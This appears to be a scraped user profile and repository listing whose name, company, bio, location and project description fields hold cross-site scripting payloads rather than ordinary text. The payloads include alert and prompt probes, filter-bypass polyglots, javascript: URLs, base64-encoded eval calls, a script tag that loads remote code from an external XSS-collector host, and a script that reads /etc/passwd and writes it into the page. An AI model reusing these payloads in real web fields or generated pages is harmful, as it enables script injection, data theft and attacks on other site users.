Name: <script>$.getScript("//kalinuxsam.xss.ht")</script>
Type: User
Company: <audio src onloadstart=alert(1)>
Bio: "><img src='https://14.rs'>
4"><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
<a+id="a"href=javascript%26colon;
Location: "><img src=x onerror=alert(document.domain)>
<script>$.getScript("//kalinuxsam.xss.ht")</script>'s Projects
<!--<img src="--><img src=x onerror=alert(1)//">
The template repository for the “><svg/onload=alert(xss)>”@x.y course on Learning Lab.
<IMG SRC="  javascript:alert('XSS');">
"><img src=x onerror=alert(document.domain)>
"><img src=x onerror=alert(document.domain)>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
.github/workflows/"><script src='https:/14.rs'></<video><source onerror="javascript:alert(document.domain)">
<video><source onerror="alert(1)">
4"><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
The template repository for the %60%2balert/**/(1)%2b%60 course on Learning Lab.
The open-source repo for docs.github.com
DT
financial-times
A robot powered training repository :robot:
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script>
#<img src=x onerror=alert('XSS')>
The template repository for the #<img src=x onerror=alert('XSS')> course on Learning Lab.
WIP: Restructuring Mattermost documentation.
"><img src='https://14.rs'> 4"><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%> <a+id="a"href=javascript%26colon;alert%26lpar;1%26rpar;+id="a" style=width:100%25;height:100%25;position:fixed;left:0;top:0 x>Click me plz</a> %60%2balert/**/(1)%2b%60 abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e %3Ca+href%3D%22%01java%03script%3Aconfirm%28document.domain%29%22%3EClick+to+execute%3Ca%3E%0D%0A "><b onbeforescriptexecute=prompt(document.domain)> %0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` signin?ReturnUrl=%19Jav%09asc%09ript%3ahttps%20%3a%2f%2fwww%2estarbucks%2ecom%2f%250Aalert%2528document.domain%2529 Login <svg/onload=eval(atob(‘YWxlcnQoJ1hTUycp’))> <script>alert('123')</script> */alert(1)">'onload="/*<svg/1=' `-alert(1)">'onload="`<svg/1=' <script>alert(XSS)</script> /on<script>load=prompt(document.domain);>”/><svg [code]javascript://%0dalert%28document.cookie%29[/code] /on<script>load=prompt(document.domain);> javascript:alert(1) <a href="javascript:alert('xss')">Click me!</a> [Click me too!](javascript:alert%28"xss"%29) [Click me too!](javascript:alert("xss")) javascript:alert('1') javascript:alert("1") <script>document.alert('XSS');</script> “><svg/onload=alert(xss)>”@x.y "><IFRAME SRC="javascript:alert("XSS");"></IFRAME> "><img src=x onerror javascript=alert(1337)">.jpg "><img src=x onerror=alert(document.domain)> "/><svg/onload=prompt(document.domain)> --></script><script>alert(document.domain);// "><img src=x onerror=window.open('https://www.hackerone.com/');> <img src="a" onerror='eval(atob("cHJvbXB0KDEpOw=="))' #<img src=x onerror=alert(document.domain)> #<img src=x onerror=alert('XSS')> <script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};x.open("GET","file:///etc/passwd");x.send();</script> >"' '';!--"<'XSS'>=&{()} '';!--"<script>alert(0);</script>=&{()} '';!--"<script>alert(0);</script>=&{(alert(1))} `><script>alert(0)</script> <script>a=eval;b=alert;a(b(/i/.source));</script> <code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>
"><img src=x onerror=alert(document.domain)>